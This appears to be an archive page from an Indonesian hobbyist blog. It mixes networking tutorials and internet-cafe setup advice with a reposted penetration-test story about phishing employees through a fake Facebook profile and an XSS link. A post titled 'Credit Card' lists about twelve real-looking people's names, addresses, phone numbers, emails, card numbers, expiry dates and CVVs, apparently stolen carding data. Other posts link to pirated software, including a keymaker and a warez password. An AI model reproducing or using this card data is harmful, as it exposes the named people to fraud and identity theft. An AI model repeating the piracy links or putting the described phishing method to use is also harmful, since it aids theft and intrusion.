Archives

Tekhnik Dasar Pengkabelan

Dalam dunia networking, dikenal beberapa jenis kabel yang sering digunakan. Setiap jenis kabel mempunyai kemampuan dan spesifikasinya yang berbeda, oleh karena itu dibuatlah pengenalan tipe kabel. Ada dua jenis kabel yang dikenal secara umum, yaitu twisted pair (UTP unshielded twisted pair dan STP shielded twisted pair) dan coaxial cable.
Gambar dibawah ini merupakan tipe kategori kabel yang digunakan dalam jaringan (cable category)

Gambar 1. Kategori Kabel

Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga dan juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas pembungkusan kabel (isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang kabel. Selain itu juga untuk menentukan besaran frekuensi yang bisa lewat pada sarana kabel tersebut, dan juga kualitas isolator sehingga bisa mengurangi efek induksi antar kabel (noise bisa ditekan sedemikian rupa).

Sedangkan untuk coaxial cable, dikenal dua jenis, yaitu thick coaxial cable (diameter lumayan besar) dan thin coaxial cable (diameter lebih kecil).
Thick coaxial cable (Kabel Coaxial “gemuk”) dispesifikasikan berdasarkan standar IEEE 802.3 10BASE5, dimana kabel ini mempunyai diameter rata-rata 12mm, dan biasanya diberi warna kuning; kabel jenis ini biasa disebut sebagai standard ethernet atau thick Ethernet, atau hanya disingkat ThickNet, atau bahkan cuman disebut sebagai yellow cable.
Thin coaxial cable (Kabel Coaxial “Kurus”), banyak dipergunakan di kalangan radio amatir, terutama untuk transceiver yang tidak memerlukan output daya yang besar. Untuk digunakan sebagai perangkat jaringan, kabel coaxial jenis ini harus memenuhi standar IEEE 802.3 10BASE2, dimana diameter rata-rata berkisar 5mm dan biasanya berwarna hitam atau warna gelap lainnya. Setiap perangkat (device) dihubungkan dengan BNC T-connector. Kabel jenis ini juga dikenal sebagai thin Ethernet atau ThinNet.

Twisted Pair
Pengkabelan Twisted Pair menggunakan sebuah modul Rregistered Jack (RJ) yang disebut RJ-45. Hal yang perlu dipahami adalah untuk memastikan bahwa, kita menghubungkan warna yang tepat pada pin RJ-45 yang tepat. Dan RJ-45 dengan arah menghadap kedepan. Terdapat beberapa konsensus yang mengatur urutan pemasangan kabel, yaitu : 568A, 568B atau 258A. Semuanya merupakan konsensus yang menjelaskan, kabel mana harus pergi ke pin yang mana.


Untuk urutan kabel diatas adalah standar yg digunakan secara umum; tapi kita bisa juga melakukan pengurutan kabel sesuai dengan keinginan kita; tentu saja konsekwensi-nya jika terjadi permasalahan yg terjadi pada jaringan akan menyulitkan kita, karena kita membuat standar pengkabelan tersendiri.

Standar 568A (Standar ini juga sesuai dengan standar Northern Telecom pada ISDN.)

Gambar 3. Kabel Standar TIA 568A
Standar yg biasa digunakan untuk koneksi PC to Hub / Switch.

Gambar 4. Kabel Standar TIA 568B

Kemudian Standar untuk koneksi PC to PC dan PC to Hub, mengenal adanya Straight Cable dan Cross Cable.
Straight Cable
Biasanya digunakan untuk koneksi PC to PC, standar yg digunakan adalah TIA568A, dimana kedua ujungnya menggunakan model seperti gambar 3.

[b]Cross Cable
Sedangkan Cross Cable digunakan untuk koneksi PC to PC. Satu ujungnya memiliki urutan standar T568A dan ujung yang satunya menggunakan standar T568B.

Gambar dibawah ini mungkin lebih bisa menjelaskan perbedaan antara cross link dengan straight link connection



Semoga dapat dimengerti dan tidak membingungkan

Read More..
Category:   4 Comments
Membangun Usaha Warnet

Sebelumnya saya minta maaf jika tulisan saya jelek maklum newbie.Saya akan menyampaikan pengalaman saya mengenai cara-cara membangun warnet mulai dari nol.Awal mulanya dulu saya tidak berniat membuka warnet, karena dulu uang ya mo dipakai buat membangun warnet adalah uang yg sebenarnya dipake buat beli motor.

Tapi setelah saya kaji ulang....(ciye-ciye) saya membatalkan niat saya untuk membeli motor.Sebenarnya saya dah ada motor yg mnrtku masih bagus untuk kuliah walaupu sering rusak hehe.....Akhirnya saya memberanikan diri untuk membuka warnet di kampung saya.Dengan bantuan teman kuliah saya dalam pembuatan jaringan internetnya.

Membuat warnet tu sebenarnya mudah tinggal niat kita ja mo apa ga.Dan yang paling penting adalah modal, karena tanpa modal takan pernah ada warnet hehehe....Modalnya tidak terlalu besar kok.Karena saya da dikampung dan warnet belum ada
dikampung saya,maka untuk melihat pasaran dulu saya pasang 5 kompi, 1 kompi server dan 4 kompi client.Untuk windowsnya tidak ori karena modal terbatas.

Spek kompi terdiri dari :

  • Prosesor Intel pentium 4
  • HDD 80 Gb
  • Ram/memory 512
  • Motherbot ENPC
  • Monitor LG 15"
  • Key + mouse komic
  • Estavol
Untuk harga kompi kemarin murah karena dolar belum naik, harga 1 PC 2 jt.Oiya untuk PC server usahakanlah speknya lebih tinggi dari client.Namanya juga server jadi ya harus tahan banting(bagus) karena server adalah pusat dari jaringan warnet.

Sedangkan untuk ruangan saya tidak menggunakan AC saya hanya memasang kipas angin.Selain dari segi menghemat listrik dan modal dikampung saya rata2 oarng yang ngenet adalh perokok.Ruangan yang saya gunakan boleh dibilang sempit ukuranya 3m x 10m.Jadi warnet saya letaknya memanjang kesamping.Sedangkan ukuran tiap bilik 150cm x 150cm.

Untuk koneksinya saya menggunakan speedy Up to 1 Mbps.Karena dikampung saya cuma speedy adnya dan harganya juga terjangkau.Saya tidak menggunakan rooter untuk membagi bandwith.Karena menurut saya pembagian bandwith malah membatasi speed koneksi kita.Jadi walaupun sepi atau rame kecepatnya sama ja.mLhan lebih lemot jika sedang ramai pengunjung.Mungkin kebanyakan warnet memilih menggunakan rooter karena biar adil dalam pembagian bandwithnya dan tidak saling berebut bandwith.Tapi menurut saya percuma jika bandwith yg dibagi itu adalah speedy.Speedy itu kebanyakan lemotnya daripada kencengnya jadi klenapa harus dibagi kalau koneksi sudah sangat lelet hehehe....maafkan aku speedy tp emg kenyataanya kaya gitu.

Triknya gini, user cenderung semuanya mencari akses internet yg kenceng dari pada fasilitas yg memadai pada saat download.Dan untuk mendownload kebanyakan orang menggunakan intrernet Download manager.Sedangkan download manager itu sendiri menyedot bandwith yg sangat besar.Otomatis file yg didownload cepat selesai walaupun mengorbankan orang yg sedang browshing.Tp user tersebut akan memberitahukan pada teman-temanya kalau diwarnet A lebih kenceng koneksinya dari pada di warnet B.Disitulah kelebihan jika tidak menggunakan rooter.

Ok sekarang untuk pembuatan jaringanya pertama yg diperlukan adalah kabel rj45, konektor, switch hub dan modem(biasanya dapet gratis dari ISP).Urutan koneksinya gini modem >> switch hub >> server dan client.Itu tergantung pengesetan modem, mo menggunakan PPPoE atau Bridge.Kalau saya pribadi menggunakan settingan PPPoE karena lebih praktis.Lanjut ajka ya mulai dari pemasangan kabel rj45 dan konektor, saya contohkan dgn gambar dibawah ini atau dapat dilihat langsung penjelasan lengkapnya disini


setelah kabel rj45 selesai dibuat tinggal pemasangan switch hub kemudian hubungkan ke komputer server dan client.Kalau pemasangan kabel rj45 benar maka di switch hub warna lampu tiap client berwarna hijau.Jangan lupa switch di hubungkan ke modem karena tanpa ada modem sampe kiamat juga koneksi internet tidak akan tersambung, ingat ya alurnya gini kia memakai PPPoE internet >>> modem >>> switch hub >>> server dan client.

Disini saya menggunakan modem Aztech dan settingan PPPoE, saya akan menyontohkan penyetinganya agar lebih mudah dimengerti

ketik di browsher 192.168.1.1 akan muncu l seprti gmbar dibawah
kemudian login, untuk login deafult biasanya username: admin dan password : admin



Selanjutnya pilih pada bagian advanced dan pilih New connection
poin-poin penting yang saya lingkari

setelah semua data yg saya lingkari selesai diisi klik submit kemudian save settings lalu restart router.oiya jangan lupa di ganti password deafultnya, biasanya hal kecil seperti itu yg di sepelekan tapi itu sangat penting, untuk mengantisipasi jika ada user yang nakal.
jika settingan sudah selesai tinggal kita cek apakah internet sudah terkoneksi dengan melakukan browshing.

software apa saja yg dibutuhkan warnet itu??? banyak pertanyaan seperti itu yg muncul.untuk software yg dibutuhkan standart aja sebenarnya
*Billing
banyak terdapat billing cari saja di google, kalau saya menggunakan Billing Explorer F.09.Dapat juga di dwnload di http://www.indowebster.com/Billing_Explorer_F09.html

*Winamp
program yang sangat dibutuhkan karena paara user biasanya ngenet sambil mendengarkan musik

*Microsoft Office
Banyakl kegunaanya semua user pasti membutuhkanya atau dapat juga di ganti dengan open office

*Deepfreeze
Kegunaanya adalah mengembalikan program seperti sediakala setelah kompi di restart atau shutdown.Software ini sangat di perlukan karena selain dapat meminimalisir virus juga mencegah tangan-tangan jail user jika sewaktu-waktu user merubah atau menambahkan program di komputer client.

*GOM
Media player yang digunakan untuk melihat video berekstensi .mpeg .flv .3gp .wmv dan masih banyak lagi.Pilihan kedua juga bisa menggunkan media player clasic

*Mozilla Firefox
Browsher satu ini adalah andalan setiap user selain mudah dipakai kecepatanya pun tidak diragukan.Dibandingkan dengan Internet Explore dan Opera menurut saya Mozzila Firefox adalah yg no.1

*Yahoo! Messenger
Semua sudah tidak asing algi dengan program yg satu ini.Program ini di gunakan untuk chatting sama halnya seperti Mirc

*mIRC
Sama halnya seperti yahoo meesenger,program ini juga digunakan untuk chat bahkan lebih.Program ini berukkuran kecil tapi manfaatnya sangat banyak karena bisa juga di gunakan untuk mencari CC :D

*Antivir
Namanya juga antivir pasti di pakai untuk menangkal virus-virus cinta upss salah virus worm dan lain sebagainya.Rekomandasi dari saya adalha avira karena tidak terlalu memberatkan PC

*Adobe photoshop CS 2
untuk mengedit gambar, walaupun tidak terlalu penting namun untuk berja-jaga saja jika ada user yg membutuhkan.

*Winrar
Digunakan untuk mengeksrtrak file zip atau sebaliknya, rata2 user yang mendownload adlah berbentuk .zip jadi untuk membukanya dibutuhkan winrar untuk mengekstraknya


Sekian tutorial dari saya(K4kar0to) jika tulisan saya jelek mohon di maafkan semoga membantu teman-teman yag pengen membangun usaha warnetnya sendiri.

Read More..
Gmail Dapat Digunakan Secara Offline di Ponsel

Belum sampai sebulan berlalu sejak Google mengumumkan fitur pemakaian Gmail secara offlinedesktop melalui teknologi Google Gears, kini di Mobile World Congress Vic Gundotra yang menjabat posisi VP of Engineering di Google memperlihatkan sebuah versi Gmail yang juga mendukung pemakaian offline untuk ponsel pintar seperti iPhone dan HTC Magic (Android).

Perbedaan utama implementasi fitur offline Gmail mobile adalah fakta bahwa mereka bahkan tidak perlu menggunakan Google Gears untuk menyimpan data secara lokal, melainkan menggunakan dua komponen kunci HTML 5 yaitu "Database" dan "App Cache". Selain dapat membaca email secara offline, versi mobile ini juga mendukung penggunaan label, fitur-fitur lain masih belum banyak didiskusikan, tetapi seharusnya kita akan mendengar lebih banyak lagi berita tentang fitur ini menjelang diluncurkannya versi baru Gmail.

Gundotra juga menekankan bahwa versi mobile Gmail memiliki tampilan yang sama persis, baik di iPhone maupun HTC Magic yang menggunakan browser berbeda (walaupun tetap berbasis WebKit), menambahkan bahwa para pengembang tentunya sangat senang dengan inovasi ini, karena mereka kini hanya perlu menulis satu aplikasi saja yang langsung dapat dipakai di semua platform dengan browser yang mendukung HTML 5.

Selain Gmail, Gundotra juga memperlihatkan Google Maps baru untuk Palm Pre, sebuah ponsel pintar buatan Palm dengan WebOS yang juga mendukung kapabilitas multi touch.

di

Read More..
Category:   Leave a Comment
Facebook from the hackers perspective

For the past few years we've (Netragard) been using internet based Social Networking tools to hack into our customer's IT Infrastructures. This method of attack has been used by hackers since the conception of Social Networking Websites, but only recently has it caught the attention of the media. As a result of this new exposure we've decided to give people a rare glimpse into Facebook from a hackers perspective.

Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest).

Humans have a natural tendency to trust each other. If one human being can provide another human with "something sufficient" then trust is earned. That "something sufficient" can be a face to face meeting but it doesn't always need to be. Roughly 90% of the people that we've targeted and successfully exploited during our social attacks trusted us because they thought we worked for the same company as them.

The setup...

Facebook allows its users to search for other users by keyword. Many facebook users include their place of employment in their profile. Some companies even have facebook groups that only employees or contractors are allowed to become members of. So step one is to perform reconnaissance against those facebook using employees. This can be done with facebook, or with reconnaissance tools like Maltego and pipl.com.

Reconnaissance is the military term for the collection of intelligence about an enemy prior to attacking the enemy. With regards to hacking, reconnaissance can be performed against social targets (facebook, myspace, etc) and technology targets (servers, firewalls, routers, etc). Because our preferred method of attacking employees through facebook is via phishing we normally perform reconnaissance against both vectors.

When setting up for the ideal attack two things are nice to have but only one is required. The first is the discovery of some sort of Cross-site Scripting vulnerability (or something else useful) in our customers website (or one of their servers). The vulnerability is the component that is not required, but is a nice to have (we can set up our own fake server if we need to). The second component is the required component, and that is the discovery of facebook profiles for employees that work for our customer (other social networking sites work just as well).

In one of our recent engagements we performed detailed social and technical reconnaissance. The social reconnaissance enabled us to identify 1402 employees 906 of which used facebook. We didn't read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile. The technical reconnaissance identified various vulnerabilities one of which was the Cross-site Scripting vulnerability that we usually hope to find. In this case the vulnerability existed in our customer's corporate website.

Cross-site scripting ("XSS") is a kind of computer security vulnerability that is most frequently discovered in websites that do not have sufficient input validation or data validation capabilities. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. This injection can be done sever side by saving the injected code on the server (in a forum, blog, etc) or it can be done client side by injecting the code into a specially crafted URL that can be delivered to a victim.

During our recent engagement we used a client side attack as opposed to a server side attack . We chose the client side attack because it enabled us to select only the users that we are interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page.

The payload that we created was designed to render a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users credentials are entered the form submitted them to http://www.netragard.com and were extracted by an automated tool that we created.

After the payload was created and tested we started the process of building an easy to trust facebook profile. Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. We found a fitting photograph by searching google images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee facebook profiles.

Upon completion we joined our customer's facebook group. Joining wasn't an issue and our request was approved in a matter of hours. Within twenty minutes of being accepted as group members, legitimate customer employees began requesting our friendship. In addition to inbound requests we made hundreds of outbound requests. Our friends list grew very quickly and included managers, executives, secretaries, interns, and even contractors.

After having collected a few hundred friends, we began chatting. Our conversations were based on work related issues that we were able to collect from legitimate employee profiles. After a period of three days of conversing and sharing links, we posted our specially crafted link to our facebook profile. The title of the link was "Omigawd have you seen this I think we got hacked!" Sure enough, people started clicking on the link and verifying their credentials.

Ironically, the first set of credentials that we got belonged to the person that hired us in the first place. We used those credentials to access the web-vpn which in turn gave us access to the network. As it turns out those credentials also allowed us to access the majority of systems on the network including the Active Directory server, the mainframe, pump control systems, the checkpoint firewall console, etc. It was game over, the Facebook hack worked yet again.

During testing we did evaluate the customer's entire infrastructure, but the results of the evaluation have been left out of this post for clarity. We also provided our customer with a solution that was unique to them to counter the Social Network threat. They've since implemented the solution and have reported on 4 other social penetration attempts since early 2008. The threat that Social Networks bring to the table affects every business and the described method of attack has an extraordinarily high success rate.


Read More..
Category:   Leave a Comment
Credit Card

Info credit card ni akan saya update terus jika saya mendapatkan info cc yang terbaru

Dave Ciepluch
6314 46th Avenue
Kenosha..53142
Wisconsin
United States..262-945-3555
dave.ciepluch@gmail.com
Alvin R Ciepluch
5490995563822961
0609
cvv...900

Rick Rechtien
311 abbey point ct
St louis..63129
Missouri
United States 314-941-5340
rick@gkupr.com
5466160152461990
0809
cvv...367

Meagan Reyes
110 s. stadium apt. R6
Alice...78332
Texas
United States 361-562-3690
mea_mea_04@msn.com
5516978575071009
0509
cvv..099

Derek Freeman
3 Chestnut St.
Laura...45337
Ohio
United States 937-474-0927
ford4x4rangerfx4@yahoo.com
4862367150286427
0811
cvv...740

Brian Ervin
8202 Talbot Cove
Austin....78746
Texas
United States 512-413-5628
prowler-purple@austin.rr.com
4356030061315510
0211
cvv...353

Meridith Weaver
6300 Chestnut Road
Molino...32577
Florida
United States 850-587-5685
mweaver27@frontiernet.net
4966390000008382 0409 031


Mike Jennings
2529 Westminister Dr.
St. Charles....63301
Missouri
United States 636-357-9667
michaelrjennings2@excite.com
4432644013457630 0209 702

Charles Plumlee
2707 bow dr.
copperopolis....95228
California
United States...209 890 5573
tazchaz316@yahoo.com
4239960289428138 0509 756

Enrique Garcia
1239 CYPRESS BEND CIRCLE
Melbourne...32934
Florida
United States 321-7577 912
grt.pty@gmail.com
5445140201079924 0910 021

Jesse Thompson
2213 east 56th ave apt #2
Anchorage...99507
Alaska
United States 8142336150
yellow03srt4@yahoo.com
5438050146037706 0609 022

Robert Sloan
1401K St, NW, Suite M-104
Washington...20005
District of Columbia
United States 202-345-5012
sloanrt@gmail.com
Robert Thomas Sloan
4011804452744323 0510 985

Kathy Conroy
po box 11
Gap...17527
Pennsylvania
United States717-471-2785
picszlynn@gmail.com
5424180714460687 0710 574

salam hangat

K4kar0to

Read More..
Category:   17 Comments
Banner, Toolbar & Userbar Makers (AIO)


Download :

http://w14.easy-share.com/1702189911.html
http://www.megaupload.com/?d=MDYD7FYB http://rapidshare.com/files/157906138/Bars.Aio_g3n_downarchive_.rar.html

Read More..
Category:   Leave a Comment
Web Design Inspiration (400 Designs)


Download :

http://rapidshare.com/files/157185729/Web_Design_Inspiration.part1.rar http://rapidshare.com/files/157184372/Web_Design_Inspiration.part2.rar

Read More..
Category:   1 Comment
Windows XP Pro Custom Edition With SP3


SPECIAL FEATURES: ================ WINDOWBLINDS v.6.1 ENHANCED PRE-PATCHED (Added Xp Transparent Skin) - (just save license) ICONPACKAGER v.3.2 (REGISTERED) CUSTOM GLASS CURSERS AND VISTA SOUNDS BY DEFAULT WMP11 VISTA CUSTOMIZED SKIN BY DEFAULT LCLOCK CUSTOMIZED SETTINGS/CUSTOMIZED CALENDAR BY DEFAULT VISTA CUSTOMIZED ROCKET DOCK VISTA SIDEBAR CUSTOMIZED GADGETS CUSTOMIZED PROPERTY BOXES CUSTOMIZED INSTALLATION/BOOT/LOGON/LOGOFF SCREENS GOLD THEME (WITH DEFAULT SETTINGS) BLACK THEME (WITH DEFAULT SETTINGS)

Download :

http://rapidshare.com/files/129146527/HDHCustom2008.part01.rar
http://rapidshare.com/files/129146524/HDHCustom2008.part02.rar http://rapidshare.com/files/129146528/HDHCustom2008.part03.rar http://rapidshare.com/files/129146519/HDHCustom2008.part04.rar http://rapidshare.com/files/129164180/HDHCustom2008.part05.rar http://rapidshare.com/files/129169670/HDHCustom2008.part06.rar http://rapidshare.com/files/129169678/HDHCustom2008.part07.rar http://rapidshare.com/files/129146557/HDHCustom2008.part08.rar

Read More..
Category:   Leave a Comment
352 BootSkins + utility


Unlike other programs of same class Boot Skin does not change a kernel of a file of Windows so, does change of the screen safe. Besides, such technology allows to achieve the minimum size of

Download :

http://letitbit.net/download/f2e771666988/352BootSkins.rar.html

http://depositfiles.com/files/3eivt4wh7

http://rapidshare.com/files/156590908/352BootSkins.rar

Read More..
Category:   1 Comment
Aston 2 MENU 1.2.1


Aston2 menu - beautiful replacement to your menu "the start-up", different a considerable quantity of skins. For installation of this program any other products Aston be not required to you.
Functional features and possibilities Aston2 Menu:
- Support скинов and that. Customisations Aston2 are divided into 2 parts
- темовые and personal. Personal customisations cannot be changed by means of usual operations with themes (creation/application). Application by that, in turn, is mirrored only in customisations by that. Thus, any theme comprises customisations by that and skins. виджетов Aston2 it is possible to apply To all various skins;
- Support виджетов (the Given version contains the following виджеты: Hours, the Calendar, the Trash can, Disks, Power control, Search, the List of popular programs, the User name, Weather and Deinstalljator). Виджеты it is possible to add on a desktop, panels or pop-up menus;
- Fast and convenient search of files on local drives and the information on the Internet;
- Floppy customisation. Each menu item can be customised how it would be desirable, having made that the working environment it is even more convenient. The same it is possible to tell and about panels on desktop Aston2;
- Support of animation in all units Aston2: smooth opening and moving виджетов, animated wall-paper, animated icons and other units wigets with support skins;
- Aston2 Menu it is possible to use as under Aston 1 shell shell (since version 1.9.5), and under Explorer shell. There is no need to refuse a habitual environment to estimate possibilities of the new menu;
- Support of operations Drag'n'Drop, the simple and convenient interface;
- Support unicode;
- Standard XML used for customisation of all parametres;
- Support of various languages;
- Support of plug-ins.
- support of 64-bit systems.

Attention: Aston2 works only under Windows XP and Windows Vista.

Download :

http://letitbit.net/download/9ecdd3184352/Aston-2-MENU-1.2.1.rar.html

http://depositfiles.com/files/yy36qlids

http://rapidshare.com/files/156534185/Aston_2_MENU_1.2.1.rar

Read More..
Category:   Leave a Comment
Weisang FlexPro 7.0.24


Weisang FlexPro 7.0.24 | 57,6 MB
Not when you've seen the quality of FlexPro's output! There are many graphical analysis programs around. But only new FlexPro 7 can take data from just about any source, and place it within a structured, object-oriented project database so you can analyze trends and results without ever losing sight of any aspect of the data. That's why FlexPro is the data analysis and presentation software of choice for engineers, scientists, and anyone else who works with technical data sets.
FlexPro's easy to use, modern user interface, and one of the largest function libraries available, are first class. The vast number of import and export filters make FlexPro a core application for the analysis of measurement data. For tricky applications, the full accessibility of FlexPro's objects through Visual Basic for Applications is a real innovation! Programming is as simple as with Excel and Word and at the same time very fast, even when dealing with large data volumes. And FlexPro manages your analysis results as dynamic objects which you can use just like data sets.


Download :

http://rapidshare.com/files/156589395/wspslaod.rar

Read More..
Category:   Leave a Comment
Internet Download Manager 5.15



*All popular browsers and applications are supported!
Internet Download Manager supports all popular browsers including IE, AOL, MSN, Mozilla, Netscape, Firefox, Avant Browser, and many others. Internet Download Manager supports all versions of all popular browsers, and it can be integrated into any Internet application to take over downloads using unique "Advanced Browser Integration" feature.


*Easy downloading with one click.
When you click on a download link in a browser, IDM will take over the download and accelerate it. You don't need to do anything special, just browse the Internet as you usually do. IDM will catch your downloads and accelerate them. IDM supports HTTP, FTP, HTTPS and MMS protocols.


*YouTube grabber.
Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.


*Automatic Antivirus checking.
Antivirus checking makes your downloads free from viruses and trojans. IDM can automatically run a scanner on download completion, like AdAware, Avast, Spybot, AVG Anti-Virus, McAfee, SpywareBlaster, CCleaner and others to protect users from harmful downloaded files.


*Drag and Drop.
You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.


*IDM includes web site spider and grabber.
IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.


*IDM is multilingual.
IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.


*Download Resume.
Internet Download Manager will resume unfinished download from the place where they left off. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost or dropped connections, network problems, computer shutdowns, or unexpected power outages.

Download:
http://rapidshare.com/files/194228965/idman515.rar.html

http://rapidshare.com/files/189625403/IDM.rar

Read More..
Category:   Leave a Comment
Nero v9.26

Simply Create, Rip, Burn, Copy, Share, Backup, Play, and Enjoy! Nero 9, the easy-to-use yet powerful multimedia suite, gives you the freedom to create, rip, copy, burn, edit, share, and upload online. Whatever you want – music, video, photo, and data – share and enjoy with family and friends anytime, anywhere.

Nero 9 is the next generation of the world’s most trusted integrated digital media and home entertainment software suite. It features new cutting-edge functionality that makes enjoying digital media content simple. This easy-to-use yet powerful multimedia suite, gives you the freedom to create, rip, copy, burn, edit, share, and upload online. Whatever you want – music, video, photo, and data – enjoy and share with family and friends anytime, anywhere. With easy-to-use Nero StartSmart command center, your digital life has never been more flexible, feasible, and fun.

Nero 9 Highlights:
» Fast and easy rip, burn, Autobackup, and copy functions
» Backup files to CDs, DVDs, and Blu-ray Discs*
» Create professional-looking DVD movies with integrated 3D menus
» Copy, burn, share, upload, and create music mixes like a DJ
» Convert music, photos, and DVDs to play on your iPod® and other mobile devices
» Quick photo and video upload to My Nero, YouTube™, and MySpace
» Watch, record, pause, and customize your live TV experience
» Play AVCHD and other HD formats

Creative Projects Are Easier than Ever
Using the intuitive Nero StartSmart command center of Nero 9, your digital life has never been more flexible, feasible, and fun. You directly access features and perform one-click functions such as Audio Ripping, Burning, Copying, and AutoBackup, with optimized performance for Windows Vista® with Nero DiscCopy Gadget and Nero Live (TV) for Windows
Vista Sidebar.

Fully Enjoy Your Content at Home, Online and On-the-go
Whether it’s video, photo, or music, you can convert and share everything your imagination creates in your digital world. Convert & share multimedia files to play on iPod®, PSP®, and upload online your coolest photos and videos to share with online communities like My Nero, YouTube™, and MySpace.

Make Your PC a Dynamic Home-Entertainment Device
Experience TV from the comfort of your sofa with state-of-the-art TV technology, even for HDTV and DVB Radio. Pause, record, schedule, manage, and playback your TV shows.

Best in the Business Software Gets Better
The ripping and burning capabilities of Nero 9 are the most reliable in the industry. Burn and copy to CD, DVD, Blu-ray Disc – even copy movies*. With DVD-R Dual Layer and DVD+R Double Layer support, you’ll get more data on a disc than ever before!*

Trusted and Reliable – Backup, Restore, and Secure
Don’t lose your valuable memories and important files to life’s potential hazards, system crash, or risky hardware. Backing up, securing, and managing files and data is a point-and-click away.

Nero 9 is available in the following languages: Chinese (Simplified), Chinese (Traditional), Japanese, Korean, Czech, Norwegian, Danish, Polish, Dutch, Portuguese (Brazil), English, Russian, Finnish, Spanish, French, Spanish (Latin America), German, Swedish, Greek, Thai, Hungarian, Turkish, Italian

This Software requires the micr*soft .NET Framework 3.0 to run on Windows XP.

http://ftp22.nero.com/Nero9/Nero-9.2.6.0_trial.exe
KeyMaker :-

http://rapidshare.com/files/175689706/Nero9.rar
PASS : www.warezscene.org

Read More..
Category:   1 Comment
Text to Speech Maker 1.6.7

Text to Speech Maker - Listen to text and convert text to wav,mp3,vox files. Text to Speech Maker is a text-to-speech player that lets you listen to documents, e-mails or web pages instead of reading on screen.It also allows you to convert text to WAV,MP3 or VOX files for listening later with your portable MP3 player. Features: -Powerful functions: Text to Speech Maker is a text-to-speech player that lets you listen to documents, e-mails or web pages instead of reading on screen.It also allows you to convert text to WAV,MP3 or VOX files for listening later with your portable MP3 player. -More Voice Support: Support dozens of male, female and robotic voices for Britain English, German and French.You can download more voices at micr*soft. -Fast Converting Speed: Reading and Converting is performed directly without any temporary files, and thus enables high converting speed and economy of hard disk space. -Support Optional MP3 Quality: The "Output Sample Frequencies" and "Output Bitrates" options allow you to make a choice between the quality and the size. -Copy and Paste: support copy/cut to clipboard and paste from clipboard, that make it easy for you to read any text souce,such as emails,web pages,documents,and so on. -Support Font Settings: You can setup font(size,color and style) of the text easily.User-friendly interface,very easy to use.

http://rapidshare.com/files/147128093/Text_to_Speech_Maker_1.6.7.zip.html
http://depositfiles.com/files/8125023
http://www.zshare.net/download/19151815142e3386/
http://www.filefactory.com/file/01a46c/n/Text_to_Speech_Maker_1_6_7_zip
http://www.sendspace.com/file/ieaqkz
http://www.megaupload.com/?d=AMLNOL4Z

Read More..
Category:   Leave a Comment
Konsep IP address

Walaupun bagi para pengguna Internet umumnya kita hanya perlu mengenal hostname dari mesin yang dituju, seperti: server.indo.net.id, rad.net.id, ui.ac.id, itb.ac.id. Bagi komputer untuk bekerja langsung menggunakan informasi tersebut akan relatif lebih sulit karena tidak ada keteraturan yang dapat di programkan dengan mudah. Untuk mengatasi hal tersebut, komputer mengidentifikasi alamat setiap komputer menggunakan sekumpulan angka sebanyak 32 bit yang dikenal sebagai IP address.

Adanya IP Address merupakan konsekuensi dari penerapan Internet Protocol untuk mengintegrasikan jaringan komputer Internet di dunia. Seluruh host (komputer) yang terhubung ke Internet dan ingin berkomunikasi memakai TCP/IP harus memiliki IP Address sebagai alat pengenal host pada network. Secara logika, Internet merupakan suatu network besar yang terdiri dari berbagai sub network yang terintegrasi. Oleh karena itu, suatu IP Address harus bersifat unik untuk seluruh dunia. Tidak boleh ada satu IP Address yang sama dipakai oleh dua host yang berbeda. Untuk itu, penggunaan IP Address di seluruh dunia dikoordinasi oleh lembaga sentral Internet yang di kenal dengan IANA - salah satunya adalah Network Information Center (NIC) yang menjadi koordinator utama di dunia untuk urusan alokasi IP Address ini adalah :

InterNIC Registration Services Network Solution Incorporated 505 Huntmar Park Drive, Herndon, Virginia 22070 Tel: [800] 444-4345, [703] 742-4777 FAX: [703] 742-4811 E-mail: hostmaster@internic.net

Sedangkan untuk tingkat Asia Pasifik saat ini masih dikoordinasi oleh:

Asia Pacific Network Information Center c/o Internet Initiative Japan, Inc. Sanbancho Annex Bldg., 1-4, Sanban-cho, Chiyoda-ku, Tokyo, 102 Japan Tel: +81-3-5276-3973 FAX: +81-3-5276-6239 E-mail: domreg@apnic.net http://www.apnic.net

Struktur IP Address

IP Address terdiri dari bilangan biner sepanjang 32 bit yang dibagi atas 4 segmen. Tiap segmen terdiri atas 8 bit yang berarti memiliki nilai desimal dari 0 - 255. Range address yang bisa digunakan adalah dari 00000000.00000000.00000000.00000000 sampai dengan 11111111.11111111.11111111.11111111. Jadi, ada sebanyak 232 kombinasi address yang bisa dipakai diseluruh dunia (walaupun pada kenyataannya ada sejumlah IP Address yang digunakan untuk keperluan khusus). Jadi, jaringan TCP/IP dengan 32 bit address ini mampu menampung sebanyak 232 atau lebih dari 4 milyar host. Untuk memudahkan pembacaan dan penulisan, IP Address biasanya direpresentasikan dalam bilangan desimal. Jadi, range address di atas dapat diubah menjadi address 0.0.0.0 sampai address 255.255.255.255. Nilai desimal dari IP Address inilah yang dikenal dalam pemakaian sehari-hari. Beberapa contoh IP Address adalah :

44.132.1.20
167.205.9.35
202.152.1.250

